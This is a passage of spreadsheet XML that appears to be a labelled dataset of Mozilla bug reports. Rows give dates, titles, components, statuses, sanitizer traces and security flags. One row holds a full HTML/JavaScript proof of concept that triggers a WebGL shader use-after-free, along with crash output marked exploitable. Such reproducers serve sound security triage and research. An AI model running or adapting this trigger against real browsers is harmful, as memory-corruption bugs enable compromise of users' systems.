    #4 0x7fb968d913d0 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) dom/events/EventListenerManager.cpp:1270:17
    #5 0x7fb968d6a34d in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) dom/events/EventDispatcher.cpp:347:7
    #6 0x7fb968d6eedc in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) dom/events/EventDispatcher.cpp:700:9
    #7 0x7fb96af3f6d7 in ForwardKeyToInputMethodAppOrDispatch layout/base/nsPresShell.cpp:7228:3
    #8 0x7fb96af3f6d7 in PresShell::HandleKeyboardEvent(nsINode*, mozilla::WidgetKeyboardEvent&amp;, bool, nsEventStatus*, mozilla::EventDispatchingCallback*) layout/base/nsPresShell.cpp:7129
    #9 0x7fb96af4e9ac in PresShell::DispatchEventToDOM(mozilla::WidgetEvent*, nsEventStatus*, nsPresShellEventCB*) layout/base/nsPresShell.cpp:8324:7
    #10 0x7fb96af49dd1 in PresShell::HandleEventInternal(mozilla::WidgetEvent*, nsEventStatus*, bool) layout/base/nsPresShell.cpp:8204:11
    #11 0x7fb96af442d9 in PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*, nsIContent**) layout/base/nsPresShell.cpp:7913:12
    #12 0x7fb96a4de519 in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) view/nsViewManager.cpp:798:7
    #13 0x7fb96a4d6310 in nsView::HandleEvent(mozilla::WidgetGUIEvent*, bool) view/nsView.cpp:1140:5
    #14 0x7fb96a588118 in nsWindow::DispatchEvent(mozilla::WidgetGUIEvent*, nsEventStatus&amp;) widget/gtk/nsWindow.cpp:565:17
    #15 0x7fb96a4e7b8f in nsBaseWidget::ProcessUntransformedAPZEvent(mozilla::WidgetInputEvent*, mozilla::layers::ScrollableLayerGuid const&amp;, unsigned long, nsEventStatus) widget/nsBaseWidget.cpp:1069:3
    #16 0x7fb96a4e86b3 in nsBaseWidget::DispatchInputEvent(mozilla::WidgetInputEvent*) widget/nsBaseWidget.cpp:1184:14
    #17 0x7fb96a528c32 in mozilla::widget::TextEventDispatcher::DispatchInputEvent(nsIWidget*, mozilla::WidgetInputEvent&amp;, nsEventStatus&amp;) widget/TextEventDispatcher.cpp:206:15
    #18 0x7fb96a52c54d in mozilla::widget::TextEventDispatcher::DispatchKeyboardEventInternal(mozilla::EventMessage, mozilla::WidgetKeyboardEvent const&amp;, nsEventStatus&amp;, void*, unsigned int) widget/TextEventDispatcher.cpp:522:3
    #19 0x7fb96a5a0f11 in nsWindow::DispatchKeyDownEvent(_GdkEventKey*, bool*) widget/gtk/nsWindow.cpp:2987:9
    #20 0x7fb96a5a1c15 in nsWindow::OnKeyPressEvent(_GdkEventKey*) widget/gtk/nsWindow.cpp:3060:9
    #21 0x7fb96a5ac226 in key_press_event_cb(_GtkWidget*, _GdkEventKey*) widget/gtk/nsWindow.cpp:5886:12
    #22 0x7fb978b8dc4b in libgtk-3.so.0
0x60b000b353b0 is located 16 bytes inside of 40-byte region [0x60b000b353a0,0x60b000b353c8)
freed by thread T0 here:
    #0 0x4b6aa0 in __interceptor_free _asan_rtl_
    #1 0x7fb96b532749 in operator delete objdir-ff-asan/dist/include/mozilla/mozalloc.h:210:12
    #2 0x7fb96b532749 in nsXULPopupManager::HidePopupCallback(nsIContent*, nsMenuPopupFrame*, nsIContent*, nsIContent*, nsPopupType, bool) layout/xul/nsXULPopupManager.cpp:1131
    #3 0x7fb96b5315ba in nsXULPopupManager::FirePopupHidingEvent(nsIContent*, nsIContent*, nsIContent*, nsPresContext*, nsPopupType, bool, bool) layout/xul/nsXULPopupManager.cpp:1562:7
    #4 0x7fb96b524ed5 in nsXULPopupManager::HidePopup(nsIContent*, bool, bool, bool, bool, nsIContent*) layout/xul/nsXULPopupManager.cpp:1038:7
    #5 0x7fb96b5241d0 in nsXULPopupManager::Rollup(unsigned int, bool, mozilla::gfx::IntPointTyped&lt;mozilla::gfx::UnknownUnits&gt; const*, nsIContent**) layout/xul/nsXULPopupManager.cpp:313:7
    #6 0x7fb96b53c37c in nsXULPopupManager::KeyDown(nsIDOMKeyEvent*) layout/xul/nsXULPopupManager.cpp:2596:11
    #7 0x7fb96b53b8f5 in nsXULPopupManager::HandleEvent(nsIDOMEvent*) layout/xul/nsXULPopupManager.cpp:2521:12
    #8 0x7fb968d8fa69 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) dom/events/EventListenerManager.cpp:1099:16
    #9 0x7fb968d913d0 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) dom/events/EventListenerManager.cpp:1270:17
    #10 0x7fb968d6a34d in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) dom/events/EventDispatcher.cpp:347:7
    #11 0x7fb968d6eedc in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) dom/events/EventDispatcher.cpp:700:9
    #12 0x7fb96af3f6d7 in ForwardKeyToInputMethodAppOrDispatch layout/base/nsPresShell.cpp:7228:3
    #13 0x7fb96af3f6d7 in PresShell::HandleKeyboardEvent(nsINode*, mozilla::WidgetKeyboardEvent&amp;, bool, nsEventStatus*, mozilla::EventDispatchingCallback*) layout/base/nsPresShell.cpp:7129
    #14 0x7fb96af4e9ac in PresShell::DispatchEventToDOM(mozilla::WidgetEvent*, nsEventStatus*, nsPresShellEventCB*) layout/base/nsPresShell.cpp:8324:7
    #15 0x7fb96af49dd1 in PresShell::HandleEventInternal(mozilla::WidgetEvent*, nsEventStatus*, bool) layout/base/nsPresShell.cpp:8204:11
    #16 0x7fb96af442d9 in PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*, nsIContent**) layout/base/nsPresShell.cpp:7913:12
    #17 0x7fb96a4de519 in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) view/nsViewManager.cpp:798:7
    #18 0x7fb96a4d6310 in nsView::HandleEvent(mozilla::WidgetGUIEvent*, bool) view/nsView.cpp:1140:5
    #19 0x7fb96a588118 in nsWindow::DispatchEvent(mozilla::WidgetGUIEvent*, nsEventStatus&amp;) widget/gtk/nsWindow.cpp:565:17
    #20 0x7fb96a4e7b8f in nsBaseWidget::ProcessUntransformedAPZEvent(mozilla::WidgetInputEvent*, mozilla::layers::ScrollableLayerGuid const&amp;, unsigned long, nsEventStatus) widget/nsBaseWidget.cpp:1069:3
    #21 0x7fb96a4e86b3 in nsBaseWidget::DispatchInputEvent(mozilla::WidgetInputEvent*) widget/nsBaseWidget.cpp:1184:14
    #22 0x7fb96a528c32 in mozilla::widget::TextEventDispatcher::DispatchInputEvent(nsIWidget*, mozilla::WidgetInputEvent&amp;, nsEventStatus&amp;) widget/TextEventDispatcher.cpp:206:15
    #23 0x7fb96a52c54d in mozilla::widget::TextEventDispatcher::DispatchKeyboardEventInternal(mozilla::EventMessage, mozilla::WidgetKeyboardEvent const&amp;, nsEventStatus&amp;, void*, unsigned int) widget/TextEventDispatcher.cpp:522:3
    #24 0x7fb96a5a0f11 in nsWindow::DispatchKeyDownEvent(_GdkEventKey*, bool*) widget/gtk/nsWindow.cpp:2987:9
    #25 0x7fb96a5a1c15 in nsWindow::OnKeyPressEvent(_GdkEventKey*) widget/gtk/nsWindow.cpp:3060:9
    #26 0x7fb96a5ac226 in key_press_event_cb(_GtkWidget*, _GdkEventKey*) widget/gtk/nsWindow.cpp:5886:12
    #27 0x7fb978b8dc4b in libgtk-3.so.0
previously allocated by thread T0 here:
    #0 0x4b6d98 in malloc _asan_rtl_
    #1 0x4e87dd in moz_xmalloc memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7fb96b52d52e in operator new objdir-ff-asan/dist/include/mozilla/mozalloc.h:186:12
    #3 0x7fb96b52d52e in nsXULPopupManager::ShowPopupCallback(nsIContent*, nsMenuPopupFrame*, bool, bool) layout/xul/nsXULPopupManager.cpp:877
    #4 0x7fb96b52b631 in nsXULPopupManager::FirePopupShowingEvent(nsIContent*, bool, bool) layout/xul/nsXULPopupManager.cpp:1473:7
    #5 0x7fb96b52c50e in nsXULPopupManager::ShowPopupAtScreen(nsIContent*, int, int, bool, nsIDOMEvent*) layout/xul/nsXULPopupManager.cpp:765:3
    #6 0x7fb96a3945f5 in nsXULPopupListener::LaunchPopup(nsIDOMEvent*, nsIContent*) dom/xul/nsXULPopupListener.cpp:439:5
    #7 0x7fb96a391d95 in nsXULPopupListener::HandleEvent(nsIDOMEvent*) dom/xul/nsXULPopupListener.cpp:215:3
    #8 0x7fb968d8fa69 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) dom/events/EventListenerManager.cpp:1099:16
    #9 0x7fb968d913d0 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) dom/events/EventListenerManager.cpp:1270:17
    #10 0x7fb968d6a831 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) dom/events/EventDispatcher.cpp:390:9
    #11 0x7fb968d6ac14 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) dom/events/EventDispatcher.cpp:418:5
    #12 0x7fb968d6eedc in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) dom/events/EventDispatcher.cpp:700:9
    #13 0x7fb96af4e9eb in PresShell::DispatchEventToDOM(mozilla::WidgetEvent*, nsEventStatus*, nsPresShellEventCB*) layout/base/nsPresShell.cpp:8327:7
    #14 0x7fb96af49dd1 in PresShell::HandleEventInternal(mozilla::WidgetEvent*, nsEventStatus*, bool) layout/base/nsPresShell.cpp:8204:11
    #15 0x7fb96af4b60f in PresShell::HandlePositionedEvent(nsIFrame*, mozilla::WidgetGUIEvent*, nsEventStatus*) layout/base/nsPresShell.cpp:8029:10
    #16 0x7fb96af46d2c in PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*, nsIContent**) layout/base/nsPresShell.cpp:7816:12
    #17 0x7fb96a4de519 in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) view/nsViewManager.cpp:798:7
    #18 0x7fb96a4d6310 in nsView::HandleEvent(mozilla::WidgetGUIEvent*, bool) view/nsView.cpp:1140:5
    #19 0x7fb96a588118 in nsWindow::DispatchEvent(mozilla::WidgetGUIEvent*, nsEventStatus&amp;) widget/gtk/nsWindow.cpp:565:17
    #20 0x7fb96a4e7b8f in nsBaseWidget::ProcessUntransformedAPZEvent(mozilla::WidgetInputEvent*, mozilla::layers::ScrollableLayerGuid const&amp;, unsigned long, nsEventStatus) widget/nsBaseWidget.cpp:1069:3
    #21 0x7fb96a4e86b3 in nsBaseWidget::DispatchInputEvent(mozilla::WidgetInputEvent*) widget/nsBaseWidget.cpp:1184:14
    #22 0x7fb96a59e500 in nsWindow::OnButtonPressEvent(_GdkEventButton*) widget/gtk/nsWindow.cpp:2821:9
    #23 0x7fb96a5ae07c in button_press_event_cb(_GtkWidget*, _GdkEventButton*) widget/gtk/nsWindow.cpp:5633:5
    #24 0x7fb978b8dc4b in libgtk-3.so.0
SUMMARY: AddressSanitizer: heap-use-after-free (/mnt/scratch0/clusterfuzz/slave-bot/builds/linux_asan_firefox/custom/firefox/libxul.so+0x947b66a)
Shadow bytes around the buggy address:
  0x0c168015ea20: fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c168015ea30: fa fa fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c168015ea40: fa fa fa fa fa fa fa fa fd fd fd fd fd fa fa fa
  0x0c168015ea50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fd fd
  0x0c168015ea60: fd fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c168015ea70: fa fa fa fa fd fd[fd]fd fd fa fa fa fa fa fa fa
  0x0c168015ea80: fa fa fa fa fa fa fa fa fa fa fd fd fd fd fd fa
  0x0c168015ea90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c168015eaa0: fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa fa
  0x0c168015eab0: fa fa fa fa fa fa fd fd fd fd fd fa fa fa fa fa
  0x0c168015eac0: fa fa fa fa fa fa fa fa fa fa fa fa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9531==ABORTING</t>
        </is>
      </c>
      <c r="X3677" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3678">
      <c r="A3678" t="n">
        <v>462989</v>
      </c>
      <c r="B3678" t="inlineStr">
        <is>
          <t>2008-11-03 22:01:19 -0800</t>
        </is>
      </c>
      <c r="C3678" t="inlineStr">
        <is>
          <t>Assertion failed: "need a way to EOT now, since this is trace end"</t>
        </is>
      </c>
      <c r="D3678" t="inlineStr">
        <is>
          <t>2009-01-14 12:40:46 -0800</t>
        </is>
      </c>
      <c r="E3678" t="n">
        <v>1</v>
      </c>
      <c r="F3678" t="n">
        <v>1</v>
      </c>
      <c r="G3678" t="n">
        <v>3</v>
      </c>
      <c r="H3678" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3678" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3678" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3678" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3678" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3678" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3678" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3678" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3678" t="inlineStr"/>
      <c r="Q3678" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3678" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3678" t="inlineStr">
        <is>
          <t>mozilla1.9.1b2</t>
        </is>
      </c>
      <c r="T3678" t="n">
        <v>1</v>
      </c>
      <c r="U3678" t="n">
        <v>0</v>
      </c>
      <c r="V3678" t="n">
        <v>12</v>
      </c>
      <c r="W3678" t="inlineStr">
        <is>
          <t>Loading http://www.slate.com/id/2203120/ in mozilla-central triggers:
Assertion failed: "need a way to EOT now, since this is trace end": 0 (/Users/jruderman/central/js/src/nanojit/LIR.cpp:944)</t>
        </is>
      </c>
      <c r="X3678" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3679">
      <c r="A3679" t="n">
        <v>138236</v>
      </c>
      <c r="B3679" t="inlineStr">
        <is>
          <t>2002-04-18 11:15:03 -0700</t>
        </is>
      </c>
      <c r="C3679" t="inlineStr">
        <is>
          <t>[trunk] linux build broken</t>
        </is>
      </c>
      <c r="D3679" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E3679" t="n">
        <v>1</v>
      </c>
      <c r="F3679" t="n">
        <v>1</v>
      </c>
      <c r="G3679" t="n">
        <v>2</v>
      </c>
      <c r="H3679" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3679" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J3679" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3679" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3679" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3679" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3679" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3679" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3679" t="inlineStr"/>
      <c r="Q3679" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3679" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3679" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3679" t="n">
        <v>1</v>
      </c>
      <c r="U3679" t="n">
        <v>0</v>
      </c>
      <c r="V3679" t="n">
        <v>9</v>
      </c>
      <c r="W3679" t="inlineStr">
        <is>
          <t>Commercial build failing with the following error:
/builds/client/linux22/seamonkey/ns/xpfe/bootstrap/splash.xpm: At top level: 
/builds/client/linux22/seamonkey/ns/xpfe/bootstrap/splash.xpm:2: warning: `char  
* trunk_xpm[523]' defined but not used 
gmake[3]: *** [/builds/client/linux22/seamonkey/ns/xpfe/bootstrap/nsNativeAppSup 
portGtk.o] Error 1 
gmake[3]: Leaving directory `/builds/client/linux22/seamonkey/mozilla/xpfe/boots 
trap' 
gmake[2]: *** [netscape-bin] Error 2 
gmake[2]: Leaving directory `/builds/client/linux22/seamonkey/ns/xpfe/bootstrap' 
gmake[1]: *** [libs] Error 2 
gmake[1]: Leaving directory `/builds/client/linux22/seamonkey/ns' 
gmake: *** [build] Error 2 
ERROR: commercial build failed.  Build stopped.</t>
        </is>
      </c>
      <c r="X3679" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3680">
      <c r="A3680" t="n">
        <v>472787</v>
      </c>
      <c r="B3680" t="inlineStr">
        <is>
          <t>2009-01-08 21:31:05 -0800</t>
        </is>
      </c>
      <c r="C3680" t="inlineStr">
        <is>
          <t>Hang involving gczeal</t>
        </is>
      </c>
      <c r="D3680" t="inlineStr">
        <is>
          <t>2009-03-05 17:49:39 -0800</t>
        </is>
      </c>
      <c r="E3680" t="n">
        <v>1</v>
      </c>
      <c r="F3680" t="n">
        <v>1</v>
      </c>
      <c r="G3680" t="n">
        <v>3</v>
      </c>
      <c r="H3680" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3680" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3680" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3680" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3680" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3680" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3680" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3680" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3680" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed-in-tracemonkey, post 1.8-branch</t>
        </is>
      </c>
      <c r="Q3680" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3680" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3680" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3680" t="n">
        <v>1</v>
      </c>
      <c r="U3680" t="n">
        <v>0</v>
      </c>
      <c r="V3680" t="n">
        <v>22</v>
      </c>
      <c r="W3680" t="inlineStr">
        <is>
          <t>this.__defineSetter__("x", Math.sin)
this.watch("x", '' .concat)
gczeal(2)
x = 1
This hangs 1.9.0.x debug and trunk debug (with and without -j). Doesn't seem to affect opt because opt by default doesn't compile with the gczeal function.
Security-sensitive because of the gczeal function. Thanks Jesse for helping with the process of reduction.</t>
        </is>
      </c>
      <c r="X3680" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3681">
      <c r="A3681" t="n">
        <v>1802346</v>
      </c>
      <c r="B3681" t="inlineStr">
        <is>
          <t>2022-11-24 09:46:08 -0800</t>
        </is>
      </c>
      <c r="C3681" t="inlineStr">
        <is>
          <t>DOMParser.parseFromSafeString creates multiple SystemPrincipal instances</t>
        </is>
      </c>
      <c r="D3681" t="inlineStr">
        <is>
          <t>2023-07-17 13:33:47 -0700</t>
        </is>
      </c>
      <c r="E3681" t="n">
        <v>1</v>
      </c>
      <c r="F3681" t="n">
        <v>1</v>
      </c>
      <c r="G3681" t="n">
        <v>3</v>
      </c>
      <c r="H3681" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3681" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3681" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3681" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3681" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3681" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3681" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3681" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3681" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main109+]</t>
        </is>
      </c>
      <c r="Q3681" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3681" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3681" t="inlineStr">
        <is>
          <t>109 Branch</t>
        </is>
      </c>
      <c r="T3681" t="n">
        <v>1</v>
      </c>
      <c r="U3681" t="n">
        <v>0</v>
      </c>
      <c r="V3681" t="n">
        <v>12</v>
      </c>
      <c r="W3681" t="inlineStr">
        <is>
          <t>Since bug 1467970, `DOMParser::ParseFromSafeString` creates a brand new `SystemPrincipal` instance when being used to parse with a non-system principal. This is bad, as lots of code in gecko assumes that there is only a single system principal instance, and so will check if a principal is the system principal by pointer identity. For example, [`nsContentUtils::IsChromeDoc`](https://searchfox.org/mozilla-central/rev/5a49163b7012ded5fa1c4da5aa4f8d3f7c85a5e7/dom/base/nsContentUtils.cpp#4319) uses pointer identity to check if a principal is the system principal.
I discovered this because I fixed this issue as part of my work on bug 1443925, and it started causing screenshots test failures. It turns out that this method right now is used to parse a safe string for a non-system document [in `ScreenshotsOverlayChild.sys.mjs`](https://searchfox.org/mozilla-central/rev/5a49163b7012ded5fa1c4da5aa4f8d3f7c85a5e7/browser/components/screenshots/ScreenshotsOverlayChild.sys.mjs#359) since bug 1786558 , and then the parsed node is adopted into the content document on the next line. Normally, this would be blocked by [the check in `nsINode`](https://searchfox.org/mozilla-central/rev/5a49163b7012ded5fa1c4da5aa4f8d3f7c85a5e7/dom/base/nsINode.cpp#3502-3510), however the `nsContentUtils::IsChromeDoc` check failed to notice the chrome -&gt; content adoption due to the system principal having a different pointer identity.
After fixing the code to use a single common system principal, tests started failing as the adoption in `ScreenshotsOverlayChild` no longer worked.
I'm marking this as a security bug, as there may be other security checks bypassed or broken by having multiple system principals, and I don't know what sorts of issues it could cause.</t>
        </is>
      </c>
      <c r="X3681" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3682">
      <c r="A3682" t="n">
        <v>775852</v>
      </c>
      <c r="B3682" t="inlineStr">
        <is>
          <t>2012-07-19 23:06:50 -0700</t>
        </is>
      </c>
      <c r="C3682" t="inlineStr">
        <is>
          <t>use after free, webgl fragment shader deleted by accessor</t>
        </is>
      </c>
      <c r="D3682" t="inlineStr">
        <is>
          <t>2024-05-29 16:02:52 -0700</t>
        </is>
      </c>
      <c r="E3682" t="n">
        <v>1</v>
      </c>
      <c r="F3682" t="n">
        <v>1</v>
      </c>
      <c r="G3682" t="n">
        <v>3</v>
      </c>
      <c r="H3682" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3682" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3682" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3682" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3682" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3682" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3682" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3682" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3682" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3682" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3682" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3682" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T3682" t="n">
        <v>1</v>
      </c>
      <c r="U3682" t="n">
        <v>0</v>
      </c>
      <c r="V3682" t="n">
        <v>39</v>
      </c>
      <c r="W3682" t="inlineStr">
        <is>
          <t>Created attachment 644186
shaders2.html (May crash you)
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
Steps to reproduce:
loaded the following file:
&lt;html&gt;
  &lt;head&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;canvas id="cx"&gt;&lt;/canvas&gt;
    &lt;script&gt;
      function gc() {
        function gcRec(n) {
          if (n &lt; 1)
          return {}
          var temp = {i: "ab" + i + (i / 100000)}
          temp += "foo"
          gcRec(n-1)
        }
        for (var i = 0; i &lt; 1000; i++) {
          gcRec(10)
        }
      }
      context = cx.getContext("moz-webgl")
      program = context.createProgram()
      shader1 = context.createShader(context.VERTEX_SHADER)
      context.attachShader(program, shader1)
      Array.prototype.__defineSetter__(0, function() {
        context.detachShader(program, shader2)
        context.deleteShader(shader2)
        shader2 = null
        gc()
      })
      for (var i = 0; i &lt; 30; ++i) {
        shader2 = context.createShader(context.FRAGMENT_SHADER)
        context.attachShader(program, shader2)
        shaders = context.getAttachedShaders(program)
        console.dir(shaders[1])
      }
    &lt;/script&gt;
  &lt;/body&gt;
&lt;/html&gt;
Actual results:
firefox crashed.
exception=EXC_BAD_ACCESS:signal=10:is_exploitable=yes:instruction_disassembly=:instruction_address=0x0000000111e82a60:access_type=exec:access_address=0x0000000111e82a60:
exception=EXC_BAD_ACCESS:signal=10:is_exploitable=yes:instruction_disassembly=:instruction_address=0x0000000108a99700:access_type=exec:access_address=0x0000000108a99700:
==1901== ERROR: AddressSanitizer heap-use-after-free on address 0x00012c1ac080 at pc 0x10519470a bp 0x7fff5fbf6490 sp 0x7fff5fbf6488
READ of size 8 at 0x00012c1ac080 thread T0
    #0 0x10519470a in unsigned int CallQueryInterface&lt;nsISupports, nsWrapperCache&gt;(nsISupports*, nsWrapperCache**) (in XUL) + 170
    #1 0x106c2cfbf in bool mozilla::dom::WrapObject&lt;mozilla::WebGLShader&gt;(JSContext*, JSObject*, mozilla::WebGLShader*, nsWrapperCache*, nsID const*, JS::Value*) (in XUL) + 175
0x00012c1ac080 is located 0 bytes inside of 144-byte region [0x00012c1ac080,0x00012c1ac110)
freed by thread T0 here:
    #0 0x10000d095 in (anonymous namespace)::mz_free(_malloc_zone_t*, void*) (in firefox) + 85
    #1 0x10000cb10 in wrap_free (in firefox) + 80
    #2 0x10519e522 in mozilla::WebGLShader::Release() (in XUL) + 290</t>
        </is>
      </c>
      <c r="X3682" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3683">
      <c r="A3683" t="n">
        <v>1418465</v>
      </c>
      <c r="B3683" t="inlineStr">
        <is>
          <t>2017-11-17 12:12:00 -0800</t>
        </is>
      </c>
      <c r="C3683" t="inlineStr">
        <is>
          <t>Add an opt-out to the MOZ_CAN_RUN_SCRIPT analysis.</t>
        </is>
      </c>
      <c r="D3683" t="inlineStr">
        <is>
          <t>2022-08-17 14:01:35 -0700</t>
        </is>
      </c>
      <c r="E3683" t="n">
        <v>1</v>
      </c>
      <c r="F3683" t="n">
        <v>1</v>
      </c>
      <c r="G3683" t="n">
        <v>7</v>
      </c>
      <c r="H3683" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3683" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J3683" t="inlineStr">
        <is>
          <t>Source Code Analysis</t>
        </is>
      </c>
      <c r="K3683" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
